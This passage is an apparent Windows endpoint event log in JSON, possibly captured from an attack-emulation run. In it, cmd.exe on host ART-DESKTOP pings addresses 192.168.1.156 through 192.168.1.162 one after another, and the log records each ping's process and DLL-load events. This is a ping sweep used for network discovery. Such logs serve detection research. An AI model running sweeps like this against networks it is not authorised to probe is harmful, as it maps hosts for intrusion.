"unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572742140000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572742140000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" - }, - { - "event_type": "process", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572746830000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.156", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6236, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572746980000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572746980000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572746980000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572746980000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572746980000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572746980000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572746980000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572746980000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572746980000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572746980000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572746980000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572746980000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" - }, - { - "event_type": "process", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572751990000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.157", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4236, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572752140000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572752140000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572752140000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572752140000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572752140000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572752140000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572752140000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572752140000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572752140000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572752140000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572752140000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572752140000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" - }, - { - "event_type": "process", - "pid": 4236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572756840000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.158", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6700, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572756980000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6700, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572756990000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6700, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572756990000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6700, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572756990000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6700, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572756990000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6700, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572756990000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6700, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572756990000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6700, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572756990000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6700, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572756990000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6700, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572756990000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6700, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572756990000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6700, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572756990000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" - }, - { - "event_type": "process", - "pid": 6700, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572761990000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.159", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3348, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572762140000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3348, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572762140000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3348, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572762140000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3348, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572762140000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3348, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572762140000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3348, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572762140000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3348, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572762140000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3348, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572762140000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3348, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572762140000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3348, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572762140000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3348, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572762140000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3348, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572762140000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" - }, - { - "event_type": "process", - "pid": 3348, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572766830000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.160", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4768, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572766980000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572766980000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572766980000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572766980000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572766980000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572766980000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572766980000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572766980000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572766980000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572766980000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572766980000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572766980000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" - }, - { - "event_type": "process", - "pid": 4768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572771830000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.161", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3596, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572771980000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572771980000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572771980000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572771980000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572771980000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572771980000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572771980000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572771980000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572771980000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572771980000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572771980000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572771980000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" - }, - { - "event_type": "process", - "pid": 3596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572776990000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.162", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5596, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572777130000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572777140000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572777140000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572777140000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572777140000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572777140000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5596, - "process_name": 